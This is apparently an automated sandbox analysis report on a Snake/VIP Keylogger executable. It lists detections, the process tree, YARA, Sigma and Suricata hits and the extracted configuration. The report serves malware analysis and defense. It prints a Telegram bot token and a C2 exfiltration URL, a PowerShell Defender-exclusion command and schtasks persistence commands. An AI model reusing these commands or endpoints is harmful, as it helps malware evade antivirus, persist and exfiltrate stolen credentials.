Edit tour

Windows Analysis Report
EUYIlr7uUX.exe

Overview

General Information

Sample name:	EUYIlr7uUX.exe renamed because original name is a hash value
Original sample name:	a3939099773cda5b2c94a6f1061ffa19.exe
Analysis ID:	1528437
MD5:	a3939099773cda5b2c94a6f1061ffa19
SHA1:	004c511afa2852fd94aca2253c6978739bea715d
SHA256:	178ebc7a9fb6e2a0b5c0da522572f14ff56fa50e60507d552940256dbe596645
Tags:	32exeSnakeKeylogger
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

EUYIlr7uUX.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\EUYIlr7uUX.exe" MD5: A3939099773CDA5B2C94A6F1061FFA19)

powershell.exe (PID: 7604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7904 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7632 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

EUYIlr7uUX.exe (PID: 7772 cmdline: "C:\Users\user\Desktop\EUYIlr7uUX.exe" MD5: A3939099773CDA5B2C94A6F1061FFA19)

qggKEJlcsFa.exe (PID: 7864 cmdline: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe MD5: A3939099773CDA5B2C94A6F1061FFA19)

schtasks.exe (PID: 8012 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp2369.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

qggKEJlcsFa.exe (PID: 8064 cmdline: "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe" MD5: A3939099773CDA5B2C94A6F1061FFA19)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o", "Chat id": "1193226784"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o", "Chat_id": "1193226784", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x30795:$a1: get_encryptedPassword 0x765b5:$a1: get_encryptedPassword 0xbc1d5:$a1: get_encryptedPassword 0x30ab2:$a2: get_encryptedUsername 0x768d2:$a2: get_encryptedUsername 0xbc4f2:$a2: get_encryptedUsername 0x305a5:$a3: get_timePasswordChanged 0x763c5:$a3: get_timePasswordChanged 0xbbfe5:$a3: get_timePasswordChanged 0x306ae:$a4: get_passwordField 0x764ce:$a4: get_passwordField 0xbc0ee:$a4: get_passwordField 0x307ab:$a5: set_encryptedPassword 0x765cb:$a5: set_encryptedPassword 0xbc1eb:$a5: set_encryptedPassword 0x31e47:$a7: get_logins 0x77c67:$a7: get_logins 0xbd887:$a7: get_logins 0x31daa:$a10: KeyLoggerEventArgs 0x77bca:$a10: KeyLoggerEventArgs 0xbd7ea:$a10: KeyLoggerEventArgs
00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: EUYIlr7uUX.exe PID: 7436	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: EUYIlr7uUX.exe PID: 7436	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: EUYIlr7uUX.exe PID: 7436	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: EUYIlr7uUX.exe PID: 7436	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: EUYIlr7uUX.exe PID: 7436	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x40fc:$a1: get_encryptedPassword 0x440f:$a2: get_encryptedUsername 0x3f16:$a3: get_timePasswordChanged 0x401f:$a4: get_passwordField 0x4112:$a5: set_encryptedPassword 0x65eb:$a7: get_logins 0x654e:$a10: KeyLoggerEventArgs 0x61b7:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: EUYIlr7uUX.exe PID: 7772	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: EUYIlr7uUX.exe PID: 7772	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: EUYIlr7uUX.exe PID: 7772	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: qggKEJlcsFa.exe PID: 7864	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: qggKEJlcsFa.exe PID: 8064	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: qggKEJlcsFa.exe PID: 8064	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: qggKEJlcsFa.exe PID: 8064	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.2.qggKEJlcsFa.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.qggKEJlcsFa.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.qggKEJlcsFa.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e10d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d7b0:$a3: \Google\Chrome\User Data\Default\Login Data 0x3da0d:$a4: \Orbitum\User Data\Default\Login Data
12.2.qggKEJlcsFa.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x30a3e:$s1: UnHook 0x30a45:$s2: SetHook 0x30a4d:$s3: CallNextHook 0x30a5a:$s4: _hook
0.2.EUYIlr7uUX.exe.3cd9970.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.EUYIlr7uUX.exe.3cd9970.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.EUYIlr7uUX.exe.3cd9970.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.EUYIlr7uUX.exe.3cd9970.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e025:$a1: get_encryptedPassword 0x2e342:$a2: get_encryptedUsername 0x2de35:$a3: get_timePasswordChanged 0x2df3e:$a4: get_passwordField 0x2e03b:$a5: set_encryptedPassword 0x2f6d7:$a7: get_logins 0x2f63a:$a10: KeyLoggerEventArgs 0x2f29f:$a11: KeyLoggerEventArgsEventHandler
0.2.EUYIlr7uUX.exe.3cd9970.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c30d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b9b0:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bc0d:$a4: \Orbitum\User Data\Default\Login Data 0x3c5ec:$a5: \Kometa\User Data\Default\Login Data
0.2.EUYIlr7uUX.exe.3cd9970.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec3e:$s1: UnHook 0x2ec45:$s2: SetHook 0x2ec4d:$s3: CallNextHook 0x2ec5a:$s4: _hook
0.2.EUYIlr7uUX.exe.3d1f790.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.EUYIlr7uUX.exe.3d1f790.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.EUYIlr7uUX.exe.3d1f790.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.EUYIlr7uUX.exe.3d1f790.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e025:$a1: get_encryptedPassword 0x2e342:$a2: get_encryptedUsername 0x2de35:$a3: get_timePasswordChanged 0x2df3e:$a4: get_passwordField 0x2e03b:$a5: set_encryptedPassword 0x2f6d7:$a7: get_logins 0x2f63a:$a10: KeyLoggerEventArgs 0x2f29f:$a11: KeyLoggerEventArgsEventHandler
0.2.EUYIlr7uUX.exe.3d1f790.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c30d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b9b0:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bc0d:$a4: \Orbitum\User Data\Default\Login Data 0x3c5ec:$a5: \Kometa\User Data\Default\Login Data
0.2.EUYIlr7uUX.exe.3d1f790.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec3e:$s1: UnHook 0x2ec45:$s2: SetHook 0x2ec4d:$s3: CallNextHook 0x2ec5a:$s4: _hook
0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2fe25:$a1: get_encryptedPassword 0x75a45:$a1: get_encryptedPassword 0x30142:$a2: get_encryptedUsername 0x75d62:$a2: get_encryptedUsername 0x2fc35:$a3: get_timePasswordChanged 0x75855:$a3: get_timePasswordChanged 0x2fd3e:$a4: get_passwordField 0x7595e:$a4: get_passwordField 0x2fe3b:$a5: set_encryptedPassword 0x75a5b:$a5: set_encryptedPassword 0x314d7:$a7: get_logins 0x770f7:$a7: get_logins 0x3143a:$a10: KeyLoggerEventArgs 0x7705a:$a10: KeyLoggerEventArgs 0x3109f:$a11: KeyLoggerEventArgsEventHandler 0x76cbf:$a11: KeyLoggerEventArgsEventHandler
0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x30a3e:$s1: UnHook 0x7665e:$s1: UnHook 0x30a45:$s2: SetHook 0x76665:$s2: SetHook 0x30a4d:$s3: CallNextHook 0x7666d:$s3: CallNextHook 0x30a5a:$s4: _hook 0x7667a:$s4: _hook
0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2fe25:$a1: get_encryptedPassword 0x75c45:$a1: get_encryptedPassword 0xbb865:$a1: get_encryptedPassword 0x30142:$a2: get_encryptedUsername 0x75f62:$a2: get_encryptedUsername 0xbbb82:$a2: get_encryptedUsername 0x2fc35:$a3: get_timePasswordChanged 0x75a55:$a3: get_timePasswordChanged 0xbb675:$a3: get_timePasswordChanged 0x2fd3e:$a4: get_passwordField 0x75b5e:$a4: get_passwordField 0xbb77e:$a4: get_passwordField 0x2fe3b:$a5: set_encryptedPassword 0x75c5b:$a5: set_encryptedPassword 0xbb87b:$a5: set_encryptedPassword 0x314d7:$a7: get_logins 0x772f7:$a7: get_logins 0xbcf17:$a7: get_logins 0x3143a:$a10: KeyLoggerEventArgs 0x7725a:$a10: KeyLoggerEventArgs 0xbce7a:$a10: KeyLoggerEventArgs
0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x30a3e:$s1: UnHook 0x7685e:$s1: UnHook 0xbc47e:$s1: UnHook 0x30a45:$s2: SetHook 0x76865:$s2: SetHook 0xbc485:$s2: SetHook 0x30a4d:$s3: CallNextHook 0x7686d:$s3: CallNextHook 0xbc48d:$s3: CallNextHook 0x30a5a:$s4: _hook 0x7687a:$s4: _hook 0xbc49a:$s4: _hook
Click to see the 23 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EUYIlr7uUX.exe", ParentImage: C:\Users\user\Desktop\EUYIlr7uUX.exe, ParentProcessId: 7436, ParentProcessName: EUYIlr7uUX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe", ProcessId: 7604, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp2369.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp2369.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe, ParentImage: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe, ParentProcessId: 7864, ParentProcessName: qggKEJlcsFa.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp2369.tmp", ProcessId: 8012, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.65.255.143, DestinationIsIpv6: false, DestinationPort: 465, EventID: 3, Image: C:\Users\user\Desktop\EUYIlr7uUX.exe, Initiated: true, ProcessId: 7772, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49751

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\EUYIlr7uUX.exe", ParentImage: C:\Users\user\Desktop\EUYIlr7uUX.exe, ParentProcessId: 7436, ParentProcessName: EUYIlr7uUX.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp", ProcessId: 7632, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EUYIlr7uUX.exe", ParentImage: C:\Users\user\Desktop\EUYIlr7uUX.exe, ParentProcessId: 7436, ParentProcessName: EUYIlr7uUX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe", ProcessId: 7604, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\EUYIlr7uUX.exe", ParentImage: C:\Users\user\Desktop\EUYIlr7uUX.exe, ParentProcessId: 7436, ParentProcessName: EUYIlr7uUX.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qggKEJlcsFa" /XML "C:\Users\user\AppData\Local\Temp\tmp16F6.tmp", ProcessId: 7632, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T22:41:09.992692+0200	2803305	3	Unknown Traffic	192.168.2.8	49710	188.114.97.3	443	TCP
2024-10-07T22:41:13.346743+0200	2803305	3	Unknown Traffic	192.168.2.8	49718	188.114.97.3	443	TCP
2024-10-07T22:41:15.482436+0200	2803305	3	Unknown Traffic	192.168.2.8	49724	188.114.97.3	443	TCP
2024-10-07T22:41:18.722704+0200	2803305	3	Unknown Traffic	192.168.2.8	49732	188.114.97.3	443	TCP
2024-10-07T22:41:18.835893+0200	2803305	3	Unknown Traffic	192.168.2.8	49733	188.114.97.3	443	TCP
2024-10-07T22:41:21.235365+0200	2803305	3	Unknown Traffic	192.168.2.8	49737	188.114.97.3	443	TCP
2024-10-07T22:41:23.011472+0200	2803305	3	Unknown Traffic	192.168.2.8	49744	188.114.97.3	443	TCP
2024-10-07T22:41:23.858996+0200	2803305	3	Unknown Traffic	192.168.2.8	49747	188.114.97.3	443	TCP
2024-10-07T22:41:25.388137+0200	2803305	3	Unknown Traffic	192.168.2.8	49749	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T22:41:07.636679+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49707	132.226.8.169	80	TCP
2024-10-07T22:41:09.385038+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49707	132.226.8.169	80	TCP
2024-10-07T22:41:10.869428+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49712	132.226.8.169	80	TCP
2024-10-07T22:41:10.869433+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49713	132.226.8.169	80	TCP
2024-10-07T22:41:11.806934+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49712	132.226.8.169	80	TCP
2024-10-07T22:41:13.213999+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49717	132.226.8.169	80	TCP
2024-10-07T22:41:14.181935+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49720	132.226.8.169	80	TCP
2024-10-07T22:41:14.900722+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49721	132.226.8.169	80	TCP
2024-10-07T22:41:15.635067+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49723	132.226.8.169	80	TCP
2024-10-07T22:41:16.369460+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49725	132.226.8.169	80	TCP
2024-10-07T22:41:17.463221+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49727	132.226.8.169	80	TCP
2024-10-07T22:41:18.166331+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49729	132.226.8.169	80	TCP
2024-10-07T22:41:20.697622+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49735	132.226.8.169	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o", "Chat_id": "1193226784", "Version": "4.4"}
Source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o", "Chat id": "1193226784"}
Source: EUYIlr7uUX.exe.7772.7.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

ReversingLabs: Detection: 21%

Multi AV Scanner detection for submitted file

Source: EUYIlr7uUX.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: EUYIlr7uUX.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: EUYIlr7uUX.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49709 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49716 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49733 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49750 version: TLS 1.2

Source: EUYIlr7uUX.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

